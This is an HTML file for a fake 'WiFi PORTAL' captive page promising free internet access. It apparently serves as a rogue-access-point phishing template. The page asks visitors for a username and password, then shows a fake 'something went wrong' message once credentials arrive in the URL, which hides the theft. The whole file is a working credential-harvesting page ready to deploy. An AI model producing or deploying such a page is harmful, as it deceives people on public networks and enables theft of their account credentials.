<html>
<head>
<title>WiFi Hotspot</title>
<style>

.login-page {
  width: 600px;
  padding: center;
  margin: auto;
  
}

.form input {
  font-family: sans-serif;
  outline: 0;
  background: #f2f2f2;
  width: 100%;
  border: 0;
  margin: 0 0 15px;
  padding: 15px;
  box-sizing: border-box;
  font-size: 14px;
}
input[type=submit] {
background:#093C63; font-weight: bold; color: #f2f2f2; }
}
.form .message {
  margin: 15px 0 0;
  color: #ffffff;
  font-size: 17px;
  
}
.form .message a {
  color: #ffffff;
  text-decoration: none;
}
p{
  
  text-align: center;
  font-size: 20px;
  color: #ffffff;
}

body {
  background: #8ec3eb;
  font-family: sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;      
}
img {
    display: block;
    margin: center;
    
  padding-top: 2.5cm;
  }

::-webkit-input-placeholder {
    color: #8aaab2;
  font-weight: bold;
}
    font-weight: bold;

</style>
<script>
	function getParamsPresent() {
		var url = window.location.href;
		var queryString = url ? url.split('?')[1] : window.location.search.slice(1);
		var credentialsPage = document.getElementById('credentials');
		var okPage = document.getElementById('ok');
		if (queryString) {
			credentialsPage.style.display = 'none';
			okPage.style.display = 'block';
		} else {
			credentialsPage.style.display = 'block';
			okPage.style.display = 'none';
		}
	}
</script>
</head>
<body onload="getParamsPresent()">
<br><br><br><br>
<p align="center" ><font color="#FF2a2b" size="20px"><b>WiFi</b></font> <font color="#093C63" size="20px"><b>PORTAL</b></font><br><font color="black" size="4px">24h free Internet access</font></p>
<div id="credentials">
	<p><b>Sign in for Free internet access.</b></p>
	<div class="login-page" >
    	<div class="form" action="/">
   		<form class="register-form">
      	<input type="username" placeholder="Username" name="username"/>
      	<input type="password" placeholder="Password" name="password"/>
    	<input type="submit" value="Sign in">
    	</form>
    	</div>
	</div>
</div>
<div id="ok">
	<p><b>Ups, something went wrong. We will look into this shortly.</b></p>
</div>
</body>
</html>
